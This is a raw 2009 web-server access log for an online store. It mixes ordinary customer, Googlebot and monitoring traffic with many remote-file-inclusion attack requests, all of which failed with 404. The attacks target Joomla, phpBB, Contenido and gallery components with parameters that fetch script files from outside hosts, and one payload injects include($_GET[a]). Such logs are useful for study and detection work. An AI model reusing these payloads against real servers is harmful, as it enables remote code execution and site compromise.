213.189.2.38 - - [12/Jun/2009:02:53:56 -0400] "GET //index.php?option=com_custompages&cpage=http://bandenpaleis.nl/bp/modules/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
213.189.2.38 - - [12/Jun/2009:02:53:57 -0400] "GET /logs/access_log.Q109052300//index.php?option=com_custompages&cpage=http://bandenpaleis.nl/bp/modules/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
66.249.71.14 - - [12/Jun/2009:02:54:09 -0400] "GET /cgi-bin/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L003C38381221C100C750081+WSEQ(S0060):1+OUITEM(A0200):01107001 HTTP/1.1" 200 27013 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
195.34.78.110 - - [12/Jun/2009:02:54:13 -0400] "GET /logs/access_log.Q109052700%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
213.189.2.38 - - [12/Jun/2009:02:54:58 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://bandenpaleis.nl/bp/modules/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
213.189.2.38 - - [12/Jun/2009:02:54:59 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://bandenpaleis.nl/bp/modules/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
213.189.2.38 - - [12/Jun/2009:02:55:00 -0400] "GET /logs/access_log.Q109052100//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://bandenpaleis.nl/bp/modules/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
213.189.2.38 - - [12/Jun/2009:02:55:49 -0400] "GET //index.php?option=com_custompages&cpage=http://bandenpaleis.nl/bp/modules/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
213.189.2.38 - - [12/Jun/2009:02:55:50 -0400] "GET /logs//index.php?option=com_custompages&cpage=http://bandenpaleis.nl/bp/modules/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
213.189.2.38 - - [12/Jun/2009:02:56:02 -0400] "GET /logs/access_log.Q109051100%20%20//index.php?option=com_custompages&cpage=http://bandenpaleis.nl/bp/modules/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Jun/2009:02:56:26 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
190.144.44.36 - - [12/Jun/2009:02:56:44 -0400] "GET //include/write.php?dir=http://208.98.22.241/id.txt?%0D?? HTTP/1.1" 404 216 "-" "libwww-perl/5.79"
190.144.44.36 - - [12/Jun/2009:02:56:44 -0400] "GET /logs//include/write.php?dir=http://208.98.22.241/id.txt?%0D?? HTTP/1.1" 404 221 "-" "libwww-perl/5.79"
190.144.44.36 - - [12/Jun/2009:02:56:44 -0400] "GET /logs/access_log.Q109051800//include/write.php?dir=http://208.98.22.241/id.txt?%0D?? HTTP/1.1" 404 243 "-" "libwww-perl/5.79"
213.189.2.38 - - [12/Jun/2009:02:56:54 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://bandenpaleis.nl/bp/modules/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
213.189.2.38 - - [12/Jun/2009:02:56:55 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://bandenpaleis.nl/bp/modules/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
213.189.2.38 - - [12/Jun/2009:02:56:55 -0400] "GET /logs/access_log.Q109052100//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://bandenpaleis.nl/bp/modules/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
194.54.88.38 - - [12/Jun/2009:02:57:35 -0400] "GET /logs/access_log.Q109050700/!rfihttp://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.79"
194.54.88.38 - - [12/Jun/2009:02:57:36 -0400] "GET /!rfihttp://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 244 "-" "libwww-perl/5.79"
194.54.88.38 - - [12/Jun/2009:02:57:36 -0400] "GET /logs/!rfihttp://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.79"
66.249.71.54 - - [12/Jun/2009:02:57:58 -0400] "GET /images/_notes/nav_store_history_over_r1_c5.jpg.mno HTTP/1.1" 200 211 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
194.54.88.38 - - [12/Jun/2009:02:58:00 -0400] "GET /logs/access_log.Q109051700//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 279 "-" "libwww-perl/5.79"
194.54.88.38 - - [12/Jun/2009:02:58:00 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 252 "-" "libwww-perl/5.79"
194.54.88.38 - - [12/Jun/2009:02:58:00 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 257 "-" "libwww-perl/5.79"
190.144.44.36 - - [12/Jun/2009:02:58:12 -0400] "GET /logs/access_log.Q108112300//include/write.php?dir=http://208.98.22.241/id.txt?%0D?? HTTP/1.1" 404 243 "-" "libwww-perl/5.79"
213.189.2.38 - - [12/Jun/2009:02:58:26 -0400] "GET /logs/access_log.Q109052300//index.php?option=com_custompages&cpage=http://bandenpaleis.nl/bp/modules/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
213.189.2.38 - - [12/Jun/2009:02:58:45 -0400] "GET /logs/access_log.Q109050900//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://bandenpaleis.nl/bp/modules/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
194.54.88.38 - - [12/Jun/2009:02:58:50 -0400] "GET /logs/access_log.Q109050300/!rfihttp://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.79"
213.189.2.38 - - [12/Jun/2009:03:00:02 -0400] "GET /logs/access_log.Q109051100%20%20//index.php?option=com_custompages&cpage=http://bandenpaleis.nl/bp/modules/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
213.189.2.38 - - [12/Jun/2009:03:01:03 -0400] "GET /logs/access_log.Q109050900//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://bandenpaleis.nl/bp/modules/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
124.217.216.86 - - [12/Jun/2009:03:01:11 -0400] "GET /logs/access_log.Q109052200/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://harvestusa.org///administrator//components/idi.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.826"
124.217.216.86 - - [12/Jun/2009:03:01:11 -0400] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://harvestusa.org///administrator//components/idi.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.826"
124.217.216.86 - - [12/Jun/2009:03:01:11 -0400] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://harvestusa.org///administrator//components/idi.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.826"
124.217.216.86 - - [12/Jun/2009:03:01:20 -0400] "GET /logs/access_log.Q109051800/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://harvestusa.org///administrator//components/idi.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.826"
209.59.12.99 - - [12/Jun/2009:03:01:25 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.71.54 - - [12/Jun/2009:03:01:36 -0400] "GET /images/_notes/nav_store_history_over_r1_c3.jpg.mno HTTP/1.1" 200 210 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.54.32.201 - - [12/Jun/2009:03:01:41 -0400] "GET //bemarket/postscript/postscript.php?p_mode=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
74.54.32.201 - - [12/Jun/2009:03:01:41 -0400] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
74.54.32.201 - - [12/Jun/2009:03:01:41 -0400] "GET /logs/access_log.Q109060800%20%20//bemarket/postscript/postscript.php?p_mode=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
74.54.32.201 - - [12/Jun/2009:03:01:56 -0400] "GET /logs/access_log.Q109052100%20%20//bemarket/postscript/postscript.php?p_mode=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
213.189.2.38 - - [12/Jun/2009:03:01:59 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://bandenpaleis.nl/bp/modules/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
213.189.2.38 - - [12/Jun/2009:03:01:59 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://bandenpaleis.nl/bp/modules/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
213.189.2.38 - - [12/Jun/2009:03:01:59 -0400] "GET /logs/access_log.Q109050300//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://bandenpaleis.nl/bp/modules/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
213.189.2.38 - - [12/Jun/2009:03:02:01 -0400] "GET /logs/access_log.Q109051100//index.php?option=com_custompages&cpage=http://bandenpaleis.nl/bp/modules/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
213.189.2.38 - - [12/Jun/2009:03:03:08 -0400] "GET /logs/access_log.Q109051600//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://bandenpaleis.nl/bp/modules/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
195.34.78.110 - - [12/Jun/2009:03:03:34 -0400] "GET /logs/access_log.Q109051800%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
68.4.246.136 - - [12/Jun/2009:03:04:02 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 76245 "http://www.acesurgical.com/home_workshop.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
68.4.246.136 - - [12/Jun/2009:03:04:02 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
68.4.246.136 - - [12/Jun/2009:03:04:02 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
68.4.246.136 - - [12/Jun/2009:03:04:02 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
68.4.246.136 - - [12/Jun/2009:03:04:02 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
68.4.246.136 - - [12/Jun/2009:03:04:02 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
68.4.246.136 - - [12/Jun/2009:03:04:03 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
68.4.246.136 - - [12/Jun/2009:03:04:03 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
68.4.246.136 - - [12/Jun/2009:03:04:03 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
68.4.246.136 - - [12/Jun/2009:03:04:03 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
68.4.246.136 - - [12/Jun/2009:03:04:03 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
68.4.246.136 - - [12/Jun/2009:03:04:03 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
68.4.246.136 - - [12/Jun/2009:03:04:03 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
68.4.246.136 - - [12/Jun/2009:03:04:03 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
68.4.246.136 - - [12/Jun/2009:03:04:03 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
68.4.246.136 - - [12/Jun/2009:03:04:03 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
68.4.246.136 - - [12/Jun/2009:03:04:03 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
68.4.246.136 - - [12/Jun/2009:03:04:03 -0400] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
68.4.246.136 - - [12/Jun/2009:03:04:03 -0400] "GET /images/cat_link.gif HTTP/1.1" 200 46 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
68.4.246.136 - - [12/Jun/2009:03:04:03 -0400] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
68.4.246.136 - - [12/Jun/2009:03:04:03 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
68.4.246.136 - - [12/Jun/2009:03:04:03 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
68.4.246.136 - - [12/Jun/2009:03:04:03 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
68.4.246.136 - - [12/Jun/2009:03:04:03 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
68.4.246.136 - - [12/Jun/2009:03:04:03 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
68.4.246.136 - - [12/Jun/2009:03:04:03 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
68.4.246.136 - - [12/Jun/2009:03:04:04 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
68.4.246.136 - - [12/Jun/2009:03:04:04 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
68.4.246.136 - - [12/Jun/2009:03:04:04 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
68.4.246.136 - - [12/Jun/2009:03:04:04 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
68.4.246.136 - - [12/Jun/2009:03:04:04 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
68.4.246.136 - - [12/Jun/2009:03:04:06 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
68.4.246.136 - - [12/Jun/2009:03:04:09 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L1021CB4B51C2D400A94F036+M37+ENG HTTP/1.1" 200 38024 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
213.189.2.38 - - [12/Jun/2009:03:04:21 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://bandenpaleis.nl/bp/modules/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
213.189.2.38 - - [12/Jun/2009:03:04:23 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://bandenpaleis.nl/bp/modules/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
213.189.2.38 - - [12/Jun/2009:03:04:23 -0400] "GET /logs/access_log.Q109050300//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://bandenpaleis.nl/bp/modules/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
68.4.246.136 - - [12/Jun/2009:03:04:39 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/catalogs.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
68.4.246.136 - - [12/Jun/2009:03:04:39 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/catalogs.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
69.94.125.100 - - [12/Jun/2009:03:05:30 -0400] "GET /modules/My_eGallery/index.php?basepath=http://www.0118099987.com/board/down/id132_860233/id1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
69.94.125.100 - - [12/Jun/2009:03:05:30 -0400] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.0118099987.com/board/down/id132_860233/id1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
69.94.125.100 - - [12/Jun/2009:03:05:30 -0400] "GET /logs/access_log.Q109051100/modules/My_eGallery/index.php?basepath=http://www.0118099987.com/board/down/id132_860233/id1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
213.189.2.38 - - [12/Jun/2009:03:05:42 -0400] "GET /logs/access_log.Q109051600//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://bandenpaleis.nl/bp/modules/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
213.189.2.38 - - [12/Jun/2009:03:05:44 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://bandenpaleis.nl/bp/modules/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
213.189.2.38 - - [12/Jun/2009:03:05:44 -0400] "GET /logs/access_log.Q109050300//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://bandenpaleis.nl/bp/modules/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
213.189.2.38 - - [12/Jun/2009:03:05:45 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://bandenpaleis.nl/bp/modules/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
194.54.88.38 - - [12/Jun/2009:03:05:51 -0400] "GET /logs/access_log.Q109051600//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 279 "-" "libwww-perl/5.79"
91.121.23.156 - - [12/Jun/2009:03:05:57 -0400] "GET /ashnews.php?pathtoashnews=http://200.58.113.248/trac-juegos.com.ar/cms///administrator/components/com_virtuemart/bh.txt??? HTTP/1.1" 404 209 "-" "libwww-perl/5.813"
66.249.71.54 - - [12/Jun/2009:03:06:01 -0400] "GET /images/_notes/nav_store_history_over_r1_c2.jpg.mno HTTP/1.1" 200 208 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
213.189.2.38 - - [12/Jun/2009:03:06:25 -0400] "GET /logs/access_log.Q109051600//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://bandenpaleis.nl/bp/modules/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
69.94.125.100 - - [12/Jun/2009:03:06:51 -0400] "GET /logs/access_log.Q109051100%20%20/modules/My_eGallery/index.php?basepath=http://www.0118099987.com/board/down/id132_860233/id1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
